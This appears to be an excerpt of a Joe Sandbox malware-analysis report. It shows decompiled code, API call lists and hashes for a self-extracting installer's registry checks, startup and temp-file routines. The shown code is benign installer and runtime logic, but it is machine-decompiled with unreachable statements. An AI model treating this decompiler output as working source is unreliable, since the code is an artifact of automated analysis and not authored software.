                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032556F
                                                                                                                                                                                                                                              • Part of subcall function 003253A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003253FB
                                                                                                                                                                                                                                              • Part of subcall function 003253A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325402
                                                                                                                                                                                                                                              • Part of subcall function 003253A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032541F
                                                                                                                                                                                                                                              • Part of subcall function 003253A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0032542B
                                                                                                                                                                                                                                              • Part of subcall function 003253A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00325434
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                            • API String ID: 1979080616-3963195772
                                                                                                                                                                                                                                            • Opcode ID: da4e7a9a9b96bcefaea3d29d1a57a24692788655d3fce6412fd1506dfe21fb74
                                                                                                                                                                                                                                            • Instruction ID: 70170d6c7327dd122d9004dce9a86dde3a45494227d05953d8090a9007cdf9d0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da4e7a9a9b96bcefaea3d29d1a57a24692788655d3fce6412fd1506dfe21fb74
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24310871B00A345BCB23AB2ABD45A7E779FAB96300F25412AE907C6544DF708F428695
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 563 32256d-32257d 564 322622-322627 call 3224e0 563->564 565 322583-322589 563->565 570 322629-32262f 564->570 566 32258b 565->566 567 3225e8-322607 RegOpenKeyExA 565->567 569 322591-322595 566->569 566->570 571 3225e3-3225e6 567->571 572 322609-322620 RegQueryInfoKeyA 567->572 569->570 574 32259b-3225ba RegOpenKeyExA 569->574 571->570 575 3225d1-3225dd RegCloseKey 572->575 574->571 576 3225bc-3225cb RegQueryValueExA 574->576 575->571 576->575
                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E0032256D(signed int __ecx) {
                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                                            				int _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                            				_t31 = 0;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t31 = E003224E0(_t26);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t34 = _t13 - 1;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                                            						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                            							_v8 = 0;
                                                                                                                                                                                                                                            							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                            							if(_t24 == 0) {
                                                                                                                                                                                                                                            								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                            								L6:
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                            								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							_t31 = _v8;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t31;
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x003225b2
                                                                                                                                                                                                                                            0x003225ba
                                                                                                                                                                                                                                            0x003225cb
                                                                                                                                                                                                                                            0x003225d1
                                                                                                                                                                                                                                            0x003225d6
                                                                                                                                                                                                                                            0x003225da
                                                                                                                                                                                                                                            0x003225dd
                                                                                                                                                                                                                                            0x003225dd
                                                                                                                                                                                                                                            0x003225e3
                                                                                                                                                                                                                                            0x003225e3
                                                                                                                                                                                                                                            0x003225e3
                                                                                                                                                                                                                                            0x0032258b
                                                                                                                                                                                                                                            0x00322589
                                                                                                                                                                                                                                            0x0032262f
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00324096,00324096,?,00321ED3,00000001,00000000,?,?,00324137,?), ref: 003225B2
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00324096,?,00321ED3,00000001,00000000,?,?,00324137,?,00324096), ref: 003225CB
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,00321ED3,00000001,00000000,?,?,00324137,?,00324096), ref: 003225DD
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00324096,00324096,?,00321ED3,00000001,00000000,?,?,00324137,?), ref: 003225FF
                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00324096,00000000,00000000,00000000,00000000,?,00321ED3,00000001,00000000), ref: 0032261A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 003225F5
                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 003225C3
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 003225A8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                            • Opcode ID: e09b0a93756418633afc42930dd69f115fa61c9c1259ed7c67102ba16e68492f
                                                                                                                                                                                                                                            • Instruction ID: 3ac3a4d7f2657dc313f4ca4f5330d50932c782e0b7eb7ef58d4a276ba8122ac1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e09b0a93756418633afc42930dd69f115fa61c9c1259ed7c67102ba16e68492f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72115135942238BB9B329B92AC09DFBBF7CEF057A1F108155F808E2010D6745E45E6E1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            control_flow_graph 577 326a60-326a91 call 327155 call 327208 GetStartupInfoW 583 326a93-326aa2 577->583 584 326aa4-326aa6 583->584 585 326abc-326abe 583->585 586 326aa8-326aad 584->586 587 326aaf-326aba Sleep 584->587 588 326abf-326ac5 585->588 586->588 587->583 589 326ad1-326ad7 588->589 590 326ac7-326acf _amsg_exit 588->590 592 326b05 589->592 593 326ad9-326ae9 call 326c3f 589->593 591 326b0b-326b11 590->591 594 326b13-326b24 _initterm 591->594 595 326b2e-326b30 591->595 592->591 599 326aee-326af2 593->599 594->595 597 326b32-326b39 595->597 598 326b3b-326b42 595->598 597->598 600 326b67-326b71 598->600 601 326b44-326b51 call 327060 598->601 599->591 602 326af4-326b00 599->602 605 326b74-326b79 600->605 601->600 613 326b53-326b65 601->613 603 326c39-326c3e call 32724d 602->603 608 326bc5-326bc8 605->608 609 326b7b-326b7d 605->609 614 326bd6-326be3 _ismbblead 608->614 615 326bca-326bd3 608->615 610 326b94-326b98 609->610 611 326b7f-326b81 609->611 617 326ba0-326ba2 610->617 618 326b9a-326b9e 610->618 611->608 616 326b83-326b85 611->616 613->600 619 326be5-326be6 614->619 620 326be9-326bed 614->620 615->614 616->610 622 326b87-326b8a 616->622 623 326ba3-326bbc call 322bfb 617->623 618->623 619->620 620->605 621 326c1e-326c25 620->621 626 326c32 621->626 627 326c27-326c2d _cexit 621->627 622->610 625 326b8c-326b92 622->625 623->621 630 326bbe-326bbf exit 623->630 625->616 626->603 627->626 630->608
                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                            			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int* _t25;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed char _t41;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				E00327155();
                                                                                                                                                                                                                                            				_push(0x58);
                                                                                                                                                                                                                                            				_push(0x3272b8);
                                                                                                                                                                                                                                            				E00327208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                            				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                            				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                            				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                            				_t53 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                            					if(0 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(0 != _t56) {
                                                                                                                                                                                                                                            						Sleep(0x3e8);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t58 = 1;
                                                                                                                                                                                                                                            						_t53 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_t67 =  *0x3288b0 - _t58; // 0x2
                                                                                                                                                                                                                                            					if(_t67 != 0) {
                                                                                                                                                                                                                                            						__eflags =  *0x3288b0; // 0x2
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							 *0x3281e4 = _t58;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0x3288b0 = _t58;
                                                                                                                                                                                                                                            							_t37 = E00326C3F(0x3210b8, 0x3210c4); // executed
                                                                                                                                                                                                                                            							__eflags = _t37;
                                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                                            								goto L13;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            								_t30 = 0xff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(0x1f);
                                                                                                                                                                                                                                            						L00326FF4();
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t68 =  *0x3288b0 - _t58; // 0x2
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_push(0x3210b4);
                                                                                                                                                                                                                                            							_push(0x3210ac);
                                                                                                                                                                                                                                            							L00327202();
                                                                                                                                                                                                                                            							 *0x3288b0 = 2;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(_t53 == 0) {
                                                                                                                                                                                                                                            							 *0x3288ac = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t71 =  *0x3288b4;
                                                                                                                                                                                                                                            						if( *0x3288b4 != 0 && E00327060(_t71, 0x3288b4) != 0) {
                                                                                                                                                                                                                                            							_t60 =  *0x3288b4; // 0x0
                                                                                                                                                                                                                                            							 *0x32a288(0, 2, 0);
                                                                                                                                                                                                                                            							 *_t60();
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                                                            						_t59 =  *_t25;
                                                                                                                                                                                                                                            						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t41 =  *_t59;
                                                                                                                                                                                                                                            							if(_t41 > 0x20) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(_t41 != 0) {
                                                                                                                                                                                                                                            								if(_t54 != 0) {
                                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                            										_t59 = _t59 + 1;
                                                                                                                                                                                                                                            										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            										_t41 =  *_t59;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                            							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t29 = 0xa;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(_t29);
                                                                                                                                                                                                                                            							_t30 = E00322BFB(0x320000, 0, _t59); // executed
                                                                                                                                                                                                                                            							 *0x3281e0 = _t30;
                                                                                                                                                                                                                                            							__eflags =  *0x3281f8;
                                                                                                                                                                                                                                            							if( *0x3281f8 == 0) {
                                                                                                                                                                                                                                            								exit(_t30); // executed
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *0x3281e4;
                                                                                                                                                                                                                                            							if( *0x3281e4 == 0) {
                                                                                                                                                                                                                                            								__imp___cexit();
                                                                                                                                                                                                                                            								_t30 =  *0x3281e0; // 0x80070002
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            							goto L40;
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                            							if(_t41 == 0x22) {
                                                                                                                                                                                                                                            								__eflags = _t54;
                                                                                                                                                                                                                                            								_t15 = _t54 == 0;
                                                                                                                                                                                                                                            								__eflags = _t15;
                                                                                                                                                                                                                                            								_t54 = 0 | _t15;
                                                                                                                                                                                                                                            								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                            							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                            							__eflags = _t26;
                                                                                                                                                                                                                                            							if(_t26 != 0) {
                                                                                                                                                                                                                                            								_t59 = _t59 + 1;
                                                                                                                                                                                                                                            								__eflags = _t59;
                                                                                                                                                                                                                                            								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t59 = _t59 + 1;
                                                                                                                                                                                                                                            							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L40:
                                                                                                                                                                                                                                            					return E0032724D(_t30);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                                                                                            				__eflags = 1;
                                                                                                                                                                                                                                            				goto L7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00326b13
                                                                                                                                                                                                                                            0x00326b18
                                                                                                                                                                                                                                            0x00326b1d
                                                                                                                                                                                                                                            0x00326b24
                                                                                                                                                                                                                                            0x00326b24
                                                                                                                                                                                                                                            0x00326b30
                                                                                                                                                                                                                                            0x00326b39
                                                                                                                                                                                                                                            0x00326b39
                                                                                                                                                                                                                                            0x00326b3b
                                                                                                                                                                                                                                            0x00326b42
                                                                                                                                                                                                                                            0x00326b57
                                                                                                                                                                                                                                            0x00326b5f
                                                                                                                                                                                                                                            0x00326b65
                                                                                                                                                                                                                                            0x00326b65
                                                                                                                                                                                                                                            0x00326b67
                                                                                                                                                                                                                                            0x00326b6c
                                                                                                                                                                                                                                            0x00326b6e
                                                                                                                                                                                                                                            0x00326b71
                                                                                                                                                                                                                                            0x00326b74
                                                                                                                                                                                                                                            0x00326b74
                                                                                                                                                                                                                                            0x00326b79
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326b7d
                                                                                                                                                                                                                                            0x00326b81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326b83
                                                                                                                                                                                                                                            0x00326b8c
                                                                                                                                                                                                                                            0x00326b8d
                                                                                                                                                                                                                                            0x00326b90
                                                                                                                                                                                                                                            0x00326b90
                                                                                                                                                                                                                                            0x00326b83
                                                                                                                                                                                                                                            0x00326b81
                                                                                                                                                                                                                                            0x00326b94
                                                                                                                                                                                                                                            0x00326b98
                                                                                                                                                                                                                                            0x00326ba2
                                                                                                                                                                                                                                            0x00326b9a
                                                                                                                                                                                                                                            0x00326b9a
                                                                                                                                                                                                                                            0x00326b9a
                                                                                                                                                                                                                                            0x00326ba3
                                                                                                                                                                                                                                            0x00326bab
                                                                                                                                                                                                                                            0x00326bb0
                                                                                                                                                                                                                                            0x00326bb5
                                                                                                                                                                                                                                            0x00326bbc
                                                                                                                                                                                                                                            0x00326bbf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326bbf
                                                                                                                                                                                                                                            0x00326c1e
                                                                                                                                                                                                                                            0x00326c25
                                                                                                                                                                                                                                            0x00326c27
                                                                                                                                                                                                                                            0x00326c2d
                                                                                                                                                                                                                                            0x00326c2d
                                                                                                                                                                                                                                            0x00326c32
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326bc5
                                                                                                                                                                                                                                            0x00326bc5
                                                                                                                                                                                                                                            0x00326bc8
                                                                                                                                                                                                                                            0x00326bcc
                                                                                                                                                                                                                                            0x00326bce
                                                                                                                                                                                                                                            0x00326bce
                                                                                                                                                                                                                                            0x00326bd1
                                                                                                                                                                                                                                            0x00326bd3
                                                                                                                                                                                                                                            0x00326bd3
                                                                                                                                                                                                                                            0x00326bd6
                                                                                                                                                                                                                                            0x00326bda
                                                                                                                                                                                                                                            0x00326be1
                                                                                                                                                                                                                                            0x00326be3
                                                                                                                                                                                                                                            0x00326be5
                                                                                                                                                                                                                                            0x00326be5
                                                                                                                                                                                                                                            0x00326be6
                                                                                                                                                                                                                                            0x00326be6
                                                                                                                                                                                                                                            0x00326be9
                                                                                                                                                                                                                                            0x00326bea
                                                                                                                                                                                                                                            0x00326bea
                                                                                                                                                                                                                                            0x00326b74
                                                                                                                                                                                                                                            0x00326c39
                                                                                                                                                                                                                                            0x00326c3e
                                                                                                                                                                                                                                            0x00326c3e
                                                                                                                                                                                                                                            0x00326abe
                                                                                                                                                                                                                                            0x00326abe
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00327155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00327182
                                                                                                                                                                                                                                              • Part of subcall function 00327155: GetCurrentProcessId.KERNEL32 ref: 00327191
                                                                                                                                                                                                                                              • Part of subcall function 00327155: GetCurrentThreadId.KERNEL32 ref: 0032719A
                                                                                                                                                                                                                                              • Part of subcall function 00327155: GetTickCount.KERNEL32 ref: 003271A3
                                                                                                                                                                                                                                              • Part of subcall function 00327155: QueryPerformanceCounter.KERNEL32(?), ref: 003271B8
                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,003272B8,00000058), ref: 00326A7F
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00326AB4
                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 00326AC9
                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 00326B1D
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00326B49
                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 00326BBF
                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 00326BDA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                            • Opcode ID: 658f9e26033eca89079af1b561a0547b5d892e7ac88ab1c3a25fbc7dae6703bb
                                                                                                                                                                                                                                            • Instruction ID: ceb96bc8ed2da9a38d97c39c4b035b0ed3915614b11ef78af406c654a78f5b6d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 658f9e26033eca89079af1b561a0547b5d892e7ac88ab1c3a25fbc7dae6703bb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B741D171949774DFDB33AB69FD467AA77A8FF48720F25401EE841E7290CB7448428B90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 631 3258c8-3258d5 632 3258d8-3258dd 631->632 632->632 633 3258df-3258f1 LocalAlloc 632->633 634 3258f3-325901 call 3244b9 633->634 635 325919-325959 call 321680 call 32658a CreateFileA LocalFree 633->635 638 325906-325910 call 326285 634->638 635->638 644 32595b-32596c CloseHandle GetFileAttributesA 635->644 645 325912-325918 638->645 644->638 646 32596e-325970 644->646 646->638 647 325972-32597b 646->647 647->645
                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E003258C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				signed char _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                                                                                            				CHAR* _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                                                                                            				_t23 = __ecx + 1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t6 =  *_t27;
                                                                                                                                                                                                                                            					_t27 = _t27 + 1;
                                                                                                                                                                                                                                            				} while (_t6 != 0);
                                                                                                                                                                                                                                            				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                            				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                            				if(_t20 != 0) {
                                                                                                                                                                                                                                            					E00321680(_t20, _t36, _t33);
                                                                                                                                                                                                                                            					E0032658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                            					_v8 = _t10;
                                                                                                                                                                                                                                            					LocalFree(_t20);
                                                                                                                                                                                                                                            					_t12 = _v8;
                                                                                                                                                                                                                                            					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						CloseHandle(_t12);
                                                                                                                                                                                                                                            						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0x329124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E003244B9(0, 0x4b5, 0, 0, 0x10, 0);
